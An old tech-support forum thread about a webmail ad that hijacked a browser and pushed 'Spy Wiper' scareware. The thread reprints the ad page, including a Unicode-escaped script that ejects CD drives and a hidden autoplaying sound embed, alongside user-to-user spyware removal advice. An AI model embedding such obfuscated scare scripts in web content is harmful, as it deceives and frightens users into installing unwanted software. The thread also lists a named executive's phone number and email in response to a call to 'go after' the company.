Jump to content

What Next?


JackR

Recommended Posts

I will spare you the long story (The long story involves Hijacked Browser, and what I had to do in order to refresh damaged winsock2, and clean my system from 99 units of infestations that were deposited in the code of the Ads).For people who doubt the need for security.The following link is embedded in one of the Ads and currently executes Automatically every time that I log to my free email service.Before Clicking, make sure that you CD-Rom is not in use and that the door can be free to open.

http://default-homepage-network.com/spypop4.html

EDIT: Link removed and replaced with code only for informational purposes. See Nathan's "Link" below about this scumware.--FranEdit:The content of the Link:WARNING!!If your cd-rom drive(s) open...You DESPERATELY NEED to rid your systemof spyware pop-ups IMMEDIATELY!Spyware programmers can control yourcomputer hardware if you fail to protectyour computer right at this moment!Download Spy Wiper NOW!<i>(See other window)</i></font></b></pre></table><script type="text/javascript">document.write('\u003c\u0073\u0063\u0072\u0069\u0070\u0074\'+ 'u0020\u004c\u0041\u004e\u0047\u0055\u0041\u0047\u0045\u003d\u0022\'+ 'u0056\u0042\u0053\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\'+ 'u000a\u003c\u0021\u002d\u002d\u000d\u000a\u0053\u0065\u0074\u0020\'+ 'u006f\u0057\u004d\u0050\u0020\u003d\u0020\u0043\u0072\u0065\u0061\'+ 'u0074\u0065\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0022\u0057\'+ 'u004d\u0050\u006c\u0061\u0079\u0065\u0072\u002e\u004f\u0043\u0058\'+ 'u002e\u0037\u0022\u0020\u0029\u000d\u000a\u0053\u0065\u0074\u0020\'+ 'u0063\u006f\u006c\u0043\u0044\u0052\u004f\u004d\u0073\u0020\u003d\'+ 'u0020\u006f\u0057\u004d\u0050\u002e\u0063\u0064\u0072\u006f\u006d\'+ 'u0043\u006f\u006c\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u000d\'+ 'u000a\u0069\u0066\u0020\u0063\u006f\u006c\u0043\u0044\u0052\'+ 'u004f\u004d\u0073\u002e\u0043\u006f\u0075\u006e\u0074\u0020\'+ 'u003e\u003d\u0020\u0031\u0020\u0074\u0068\u0065\u006e\u000d\'+ 'u000a\u0046\u006f\u0072\u0020\u0069\u0020\u003d\u0020\u0030\'+ 'u0020\u0074\u006f\u0020\u0063\u006f\u006c\u0043\u0044\u0052\'+ 'u004f\u004d\u0073\u002e\u0043\u006f\u0075\u006e\u0074\u0020\'+ 'u002d\u0020\u0031\u000d\u000a\u0063\u006f\u006c\u0043\u0044\'+ 'u0052\u004f\u004d\u0073\u002e\u0049\u0074\u0065\u006d\u0028\'+ 'u0069\u0029\u002e\u0045\u006a\u0065\u0063\u0074\u000d\u000a\'+ 'u004e\u0065\u0078\u0074\u0020\u0027\u0020\u0063\u0064\u0072\'+ 'u006f\u006d\u000d\u000a\u0045\u006e\u0064\u0020\u0049\u0066\'+ 'u000d\u000a\u002d\u002d\u003e\u000d\u000a\u003c\u002f\u0073\'+ 'u0063\u0072\u0069\u0070\u0074\u003e')</script>EDIT: Post has been modified to keep Highlanders from having to scroll horizontally in order to read the posts within this topic. FYI: Originally the script above was on one line as it appears in the webpage it came from.--Fran<EMBED SRC=http://www.passthison.com/security/security.wav AUTOSTART=true HIDDEN=true LOOP=no>.

Edited by LilBambi
Link to comment
Share on other sites

nlinecomputers

What website is hosting THAT ad? I want to make sure I NEVER patronize it. And I will gladly forward that to Mike at spywareinfo.com so that more people know about it. I use Mozilla so it didn't work in my prefered browser but it does in IE 6.That is pure crap. Leave my computer alone.... :whistling: ;)

Link to comment
Share on other sites

I have the feeling that every Tech support console has a Keyboard with Huge Red button in the middle. This red button executes a macro that send email as response to your complain stating that you are a computer ignoramus and that why it happens to you.I emailed my service and got one response that comprise of that content of the Red Macro.In addition I was told that they can sell me a package that will clean up my system (probably made by the owner of the Ad that started this infestation).I responded once more with a stronger message I would not want to divulge the name of the service until I give them more time to clarify the issue.

Link to comment
Share on other sites

:whistling: ;) That's a riot! It opened both my drives using IE. I wonder how many will fall for it. No one who uses Netscape will. It doesn't work with Netscape. ;) ;) :o Edited by EdP
Link to comment
Share on other sites

nlinecomputers

This Link is all about this scumware. It uses a browser hijacker to spread it's advertising trojan. I understand your reluctance to mention the name of the website advertising this but I would simply because of the dangers involved. It's not a question of giving the webhost the chance to come clean. This should be done to prevent harm to other users.If any of you guys tested that link then you'd better scan your system, just in case.Edit: I just scanned my system and it is clean.

Link to comment
Share on other sites

Guest LilBambi

Thanks for the Link Nathan which definitely has a lot of info and some great links including this one:Spyware WarriorIf you look at January 6 entry, it mentions this particular parasite/scumware and EdP's nemisis -- Clientman!

Link to comment
Share on other sites

I would like to add the functional story.Yesterday I logged to retrieve my email.At the moment that I logged to the site a Window poped up stating that my system is insecure and that by pressing Enter I would download security software.I am too knowledgeable to fall for such a trap. However ALT Tab seemed to be disabled by this screen and I could not switch away in order to close it.Using CTL ALT DEL and getting the TaskManeger worked, but closing IE Explorer and related runing processes did not help. Well I decided to press enter.The results were BAD.I first run cleaning programs which reported (on a computer that was totally clean) 99 units of infestations (Reg Entries, DLLs files etc.). The Notepad opened with a text educating me about the fact of life on the Internet. The CD Tray opened leaving a Graphical message on the screen and playing Oh Oh wav.When I finished cleaning I notice that the Browser was Hijacked, any attempt to manually change the Home page did not work.I run a clean Reg. program, washed my cache, history etc. and rebooted. Upon reboot I lost my Internet connection. Lucky for me (I am a Big fan of NetBEUI for LAN Sharing) my Network was still working. You guessed right it is TCP/IP or to be more precise Winsock2 that was altered.I took care of it. Cleaned once more and every thing returned to normal.But hey I need my email. I logged again and presto the same story. This time I did not press enter I just switched off the computer.Upon booting I found that just by logging to the email service (No Clicking No pressing Enter, No nothing), the Browser was already Hijacked, but there was no infestation and Winsock was intact.Currently I am waiting for further clarification by the email service..

Link to comment
Share on other sites

JackR when you ran SpyBot did it say that you had ClientMan on your system by any chance? From my experience this thing reinstalls itself thru at least two different means. I didn't experience the problem with email but I didn't test that part either.If you have ClientMan I have some steps you can use to remove it.

If any of you guys tested that link then you'd better scan your system, just in case.
HEY, don't scare me like that. :) I ran Adaware and SpyBot and I'm clean.
Link to comment
Share on other sites

JackR when you ran SpyBot did it say that you had ClientMan on your system by any chance?  From my experience this thing reinstalls itself thru at least two different means.  I didn't experience the problem with email but I didn't test that part either.If you have ClientMan I have some steps you can use to remove it.
If any of you guys tested that link then you'd better scan your system, just in case.
HEY, don't scare me like that. ;) I ran Adaware and SpyBot and I'm clean.
Do not worry. That why I posted the content of the link. I cleaned every thing the Link would only open the CD-Door and play a small wav file.I did not use Spybot. My cleaning cocktail consists on other programs.I do not remember seeing Client man. Do you know the precise name of the concerning file?I look for a file with the structure clie*.* did not find any.This issue is not an email issue. The culprit is a Webmail Service. I.e. it occurs by just logging to mymailsite.com (not the real name).That is what is so alarming about it, since it does not involve opening attachments or clicking on Bizarre links, it occures by just logging to a very famous email site before even trying to retrieve the emailThe CD opening is a script, so blocking script, or using a browser that does not allow this scripting would not open the CD-ROM.I usually keep scripting off, however there are more legitimate sites that do use of such elements and it is starting to be annoying to able and disable part of the personal protection system in order to be able to get to where you want to get.Even this BBS at times doe not load correctly when NIS is On. I mentioned it to Scott few days after the BBS started running and for a while it seemed to be OK.
Link to comment
Share on other sites

nlinecomputers

Jack,Can you use mail2web.com to get your email? It is not a free email host only a website that can fetch POP or IMAP based email. If your free mail service allows this your can use that to get your mail. Also as we have pointed out Mozilla/Firebird is immune to this kind of hijacking. Another opition is to load spyware blaster it may block this kind of hijacking and allow you to get your mail.

Link to comment
Share on other sites

Cluttermagnet
Mozilla/Firebird is immune to this kind of hijacking.  Another opition is to load spyware blaster it may block this kind of hijacking and allow you to get your mail.
Nathan, have you heard about the CWS browser hijack? Merijn/cwschronicles The reason I ask is because it sounds like with the advent of scumware browser hijacks like CWS, the days of immunizing IE are at an end. The bad guys are clever and keeping out in front of Spyware Blaster, Spybot S&D, Adaware, etc. In my view it has finally reached a tipping point where IE has become, to quote a Naderism of a generation or two ago, "unsafe at any speed".
Link to comment
Share on other sites

Cluttermagnet

Wow! JackR, I'm sorry to hear about all your problems. I had no idea those free services were getting so dangerous. I still use one, whose name I would also prefer not to mention, but that outfit seems to limit itself to annoying inline ads and trying to spawn popups on their free webpages, all of which I can kill from within Firebird. They run a fairly clean webmail page without any of those annoyances. The bulk of my emailing I do as POP with my ISP server, I'm not that big a fan of webmail anyway, though I do understand how it makes good throwaway email addresses when the spam gets too bad. I hope you decide to give some other browser a shot and give up on IE. I think IE's days are numbered, as there are just too many exploits aimed at it all the time. (Hint: Firebird) ;)

Link to comment
Share on other sites

Just read about this same thing happening over at Lockergnome.The resident network guru recommended this:http://members.shaw.ca/techcd/WinsockXPFix.exe[Directions = It´s a zipped file, open it like HJT. Then tick "I know what I´m doing". Then take all instances of nmtracer.dll and move them from the left pane to the right (From "keep" window to "remove" window ) and click "finish".]Anyone tried this? Know anything about it?Cluttermagnet: I hear you loud and clear. To many people are having trouble with I.E.

Link to comment
Share on other sites

Jack,Can you use mail2web.com to get your email?
I own few domains and have a webmail/pop3 email on each one of them.It is great and it is totally under my control. I even gave boxes to family and friends so that they can avoid similar troubles as the above.I kept One public free email for very long time, it gets some of my newsletters subscriptions and I was too lazy to log to the Newsletters sites and change the address. Well I guess I am paying for being lazy. ;) P.S. I hope that my Grandson will not see this thread considering all the lectures on Laziness that he got from me. :D.
Link to comment
Share on other sites

While this whole scenario really sucks for IE users, there is one thing to keep in mind. While some of these exploits are a product of how IE is designed and how IE functions, no browser is safe. If Firebird was used by 90% of the people on the internet then the focus of these malicious people would switch to Firebird. And do not fool yourselves, Firebird would probably not fair much better than IE under the same scrutiny. Especially considering the source code is there for all to see and learn how to exploit. Don't get me wrong, I am a die hard Firebird user. It is just that no software can stand up to being the target of thousands, if not hundreds of thousands of people who wish to exploit it. Just food for thought folks.

Link to comment
Share on other sites

Guest LilBambi
Just read about this same thing happening over at Lockergnome.The resident network guru recommended this:http://members.shaw.ca/techcd/WinsockXPFix.exe[Directions =  It´s a zipped file, open it like HJT. Then tick "I know what I´m doing". Then take all instances of nmtracer.dll and move them from the left pane to the right (From "keep" window to "remove" window ) and click "finish".]Anyone tried this? Know anything about it?Cluttermagnet: I hear you loud and clear. To many people are having trouble with I.E.
Rons,Cool! Nice to know that other Forums are also recommending this very easy to use tool that just works wonders for XP when the Winsock gets hosed!We have mentioned it in various topics here as well. ;)--Stryder,You are right. No software is immune and although we are enjoying a refreshing reprieve by using other browsers, we need to keep on our toes out there no matter what browser we use!I sure hope that it takes some time for them to get to the Mozilla based browsers since they have such a large base to hit with IE users. :D
Link to comment
Share on other sites

nlinecomputers
Mozilla/Firebird is immune to this kind of hijacking.  Another opition is to load spyware blaster it may block this kind of hijacking and allow you to get your mail.
Nathan, have you heard about the CWS browser hijack? Merijn/cwschronicles The reason I ask is because it sounds like with the advent of scumware browser hijacks like CWS, the days of immunizing IE are at an end. The bad guys are clever and keeping out in front of Spyware Blaster, Spybot S&D, Adaware, etc. In my view it has finally reached a tipping point where IE has become, to quote a Naderism of a generation or two ago, "unsafe at any speed".
I haven't fully read your link but CWS hijacks by using Windows Virtual Machine (Microsoft Java). Mozilla uses Sun Java and thus can't be infected by this. Unless there is a new method I've not heard of. Nothing will last for ever but I'm resonably confident of Mozilla's abilty to prevent such attacks. That and I run spyware blaster which is a pretty good blocker of such things.
Link to comment
Share on other sites

I do not remember seeing Client man. Do you know the precise name of the concerning file?I look for a file with the structure clie*.* did not find any.
ClientMan consists of several files, ActiveX objects and registry entries. None of which are named "clie*.*" and yes I know what the "*"s represent.This is what I sent to Adaware, SpyBot and HiJack THis vendors/authors:
Hi,There is a new version of ClientMan spyware out.  Ad-aware doesn't see it and while SpyBot sees it it doesn't totally remove it, each reboot reinstalls it.I encountered this jewel after Christmas on my neighbor's daughter's pc that she brought home from college for the holidays.To remove it one must delete the following entities;O2 - BHO: (no name) - {94927A13-4AAA-476A-989D-392456427688} - C:\WINNT\System32\mseclk.dllO2 - BHO: (no name) - {95E02C52-05FC-425D-8378-9DA70F9CD763} - C:\WINNT\System32\aadl.dllO2 - BHO: (no name) - {96BE1D9A-9E54-4344-A27A-37C088D64FB4} - C:\WINNT\System32\mseffm.dllO2 - BHO: (no name) - {CC916B4B-BE44-4026-A19D-8C74BBD23361} - C:\WINNT\System32\mscdka.dllO2 - BHO: (no name) - {FCADDC14-BD46-408A-9842-CDBE1C6D37EB} - C:\WINNT\System32\msobfl.dllO16 - DPF: {33564D57-0000-0010-8000-00AA00389B71} - http://download.microsoft.com/download/F/6...922/wmv9VCM.CABThe reinstaller, O4 - HKCU\..\Run: [msmc] C:\WINNT\System32\msccof.execan not be removed under Windows even by HiJack This. (Clever these snakes.)  However, it can be RENAMED under Windows effectively disabling it.  I renamed it to $$msccof.exe which made it sort high and was easy to find and to manually delete later but it does not need to be deleted to be deactivated.hth Ed
The 016 entry appears as a common ActiveX object but it wasn't like anything I'd seen. Attached IMGs are what I saw. ActiveX%20Control%201.jpgActiveX%20Control%202.jpgActiveX%20Control%203.jpgClientMan reappeared even after the msccof file was renamed but stayed gone after the ActiveX file was deleted. In my mind it was the 2nd reinstaller.If you haven't used HiJack This you should. It makes deleteing the above Registry entries and files easy. hth
Link to comment
Share on other sites

While some of these exploits are a product of how IE is designed and how IE functions, no browser is safe. If Firebird was used by 90% of the people on the internet then the focus of these malicious people would switch to Firebird. And do not fool yourselves, Firebird would probably not fair much better than IE under the same scrutiny. Especially considering the source code is there for all to see and learn how to exploit.
Words of Wisdom.If all the energy that is spent in the eternal (and Silly) battle, and bashing.Microsoft Vs. LinuxIntel Vs. AMDnVidea Vs. ATI (and many more).IWould be directed toward the people who dish us the Junk it may be a better world.Instead many us choose the easy target which is the people who actually provide us with working tools. This might be also helpful in the ever quest for Damage Control.http://cexx.org/lspfix.htmIt was a long day. Thank you every one for your support.Edit: EdP Thanks. I just finsihed searching my system for the Clientman "Junk". Did not find any at the moment. ;) .
Link to comment
Share on other sites

nlinecomputers

Well just to keep the browser wars going.... :thumbsup: IE has six or seven secuirty holes that have yet to be fixed. Most secuirty holes that show up in Mozilla or Firebird are rapidly addressed. It is difficult to get M$ to even ADMIT to a hole let alone do something about it. Personaly I'd take the openness of addressing security problems in open source over the closed, coverup and ignore it, mentality of Microsoft anyday.

Link to comment
Share on other sites

I agree Nathan - at least Mozilla/Firebird is always coming out with updated new versions while IE is stuck in Limbo till Longhorn. BTW the new IE is dreadfully ugly too.

Link to comment
Share on other sites

JackRAgree - but .................... who am I supossed to go after? Give me a name and address and I will guarantee they will no longer bother any of us! :P I hear what you are saying - it just gets frustrating sometimes. :lol:

Link to comment
Share on other sites

Doesn't anybody run IE in a High security state anymore?  I'm seeing alot of chatter about hijacked browsers lately.
IE should be run in "Medium" security mode and *nothing* lower. The settings shouldn't even allow you to use a lower setting for the "Internet" zone.
Link to comment
Share on other sites

Doesn't anybody run IE in a High security state anymore?  I'm seeing alot of chatter about hijacked browsers lately.
IE should be run in "Medium" security mode and *nothing* lower. The settings shouldn't even allow you to use a lower setting for the "Internet" zone.
We forget that world out there is Big.Some organizations use the browser for Intranet browsing with no liaison to the Internet.Under such an arrangement they can enjoy better than Medium.BTW, my Browser is set to medium with few manual additions toward High Security. Putting it straight on High deems the Internet almost unusable. As I mentioned before many nice docile sites will not load correctly with High settings since almost no one any more uses just clean basic HTML. After all how can you have a site without few things bouncing here and there?I surf behind a Router, and software Firewall, as well as Active Virus protector, and Cookie-Pal. (I can take this load using 2.8GHz machine with 4Mb/sec. Broadband Connection)I am an Internet user since the inception of the Internet. I run Adware type of program at the end of each day, rarely I find few Reg. entries that need to be cleaned. This is the first time that some thing of this magnitude happens to me. .
Link to comment
Share on other sites

Rons, you wanted to know who to go after. I have that info for you. From my blog post here:http://www.netrn.net/archives2/000309.html and here: http://www.netrn.net/archives2/000221.htmlMail Wiper, Inc.8725 Roswell Road, #104Atlanta, GA 30350FAX: 770-518-1519 PHONE: 770-642-1117 CEO Rob MartinsonRob's telephone number: 770-642-1117 Rob's email: rob@mailwiper.com Nothing would make me happier than to see this s c u m w a r e company go down! :blink:

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...